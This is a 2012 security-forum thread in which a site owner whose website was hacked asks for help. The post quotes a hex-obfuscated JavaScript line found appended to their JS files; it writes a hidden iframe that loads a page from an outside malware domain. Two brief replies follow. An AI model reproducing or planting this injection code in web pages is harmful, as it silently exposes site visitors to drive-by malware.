1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Does anyone know about this malware georgewkohn or bentley.poststreetdental

Discussion in 'Security' started by macaela, Jul 3, 2012.

  1. #1
    Hi guys my website just been hacked google showing the red (Warning: Something's Not Right Here!
    www.xxxxxxxx.com contains malware. Your computer might catch a virus if you visit this site.)

    stating the site has trying to access these two sites
    http://bentley.poststreetdental.com/...f48be84d67654d
    http://mazda.georgewkohn.com/direct....f48be84d67654d

    Now found alot of my js files to have this code at the bottom when i remove it minimise the amount of error on chrome console inspector element, does anyone know if someone actually opened logged in to my FTP accessed the js files and paste those code into it. or if it is some sort of a program that does wrote that.
    Code:

    var _0x965b=["\x3C\x64\x69\x76\x20\x6E\x61\x6D\x65\x3D\x22\x79\x6F\x75\x74\x75\x62\x65\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x22\x35\x36\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x33\x31\x35\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x7A\x64\x61\x2E\x67\x65\x6F\x72\x67\x65\x77\x6B\x6F\x68\x6E\x2E\x63\x6F\x6D\x2F\x64\x69\x72\x65\x63\x74\x2E\x70\x68\x70\x3F\x70\x61\x67\x65\x3D\x31\x35\x66\x34\x38\x62\x65\x38\x34\x64\x36\x37\x36\x35\x34\x64\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];document[_0x965b[1]](_0x965b[0]);
    
    Code (markup):
    At momment i am trying going to every single file and delete that line of code, but I am not sure if it might be something else or if somone has a way of accessing my FTP i've changed the password.

    Any sugestion?

    Do I just delete the code on JS files? or should I look for something else on the server?
    SEMrush
     
    macaela, Jul 3, 2012 IP
    SEMrush
  2. ebiztrendz.com

    ebiztrendz.com Well-Known Member

    Messages:
    664
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    128
    #2
    This thread has itself Virus. My antivirus shown me alert.
     
    ebiztrendz.com, Jul 6, 2012 IP
  3. sabrina

    sabrina Active Member

    Messages:
    212
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    53
    #3
    What was the status message from your antivirus software ?
     
    sabrina, Aug 13, 2012 IP